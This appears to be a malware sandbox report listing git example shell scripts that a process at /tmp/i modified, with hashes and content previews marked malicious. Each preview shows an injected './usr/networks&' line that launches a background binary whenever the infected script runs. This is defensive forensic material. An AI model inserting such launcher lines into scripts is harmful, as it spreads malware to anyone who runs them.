                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                          /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:OS/2 REXX batch file, ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21942
                                                                                                          Entropy (8bit):5.106661772210516
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                          MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                          SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                          SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                          SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                          /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4825
                                                                                                          Entropy (8bit):5.113528532566079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                          MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                          SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                          SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                          SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                          /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11759
                                                                                                          Entropy (8bit):5.2205279036587235
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                          MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                          SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                          SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                          SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                          /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13843
                                                                                                          Entropy (8bit):5.402105827507175
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                          MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                          SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                          SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                          SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                          /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5954
                                                                                                          Entropy (8bit):5.053117199381536
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                          MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                          SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                          SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                          SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                          /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):61
                                                                                                          Entropy (8bit):4.0161977906092705
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                          MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                          SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                          SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                          SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):234
                                                                                                          Entropy (8bit):4.9965164312586925
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                          MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                          SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                          SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                          SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2436
                                                                                                          Entropy (8bit):5.153713997451705
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                          MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                          SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                          SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                          SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                          /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):247
                                                                                                          Entropy (8bit):4.532049748049262
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                          MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                          SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                          SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                          SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12742
                                                                                                          Entropy (8bit):5.053935136942481
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                          MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                          SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                          SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                          SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                          /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4349
                                                                                                          Entropy (8bit):4.9994650554848405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                          MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                          SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                          SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                          SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                          /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2499
                                                                                                          Entropy (8bit):5.168731776130111
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                          MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                          SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                          SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                          SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                          /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1947
                                                                                                          Entropy (8bit):5.193786239756587
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                          MD5:F1EDF5EE98492845561257661376A072
                                                                                                          SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                          SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                          SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                          /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2433
                                                                                                          Entropy (8bit):5.07831529192731
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                          MD5:71B42464943116BC0925788790C82720
                                                                                                          SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                          SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                          SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                          /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4385
                                                                                                          Entropy (8bit):5.300590299626365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                          MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                          SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                          SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                          SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                          Malicious:true
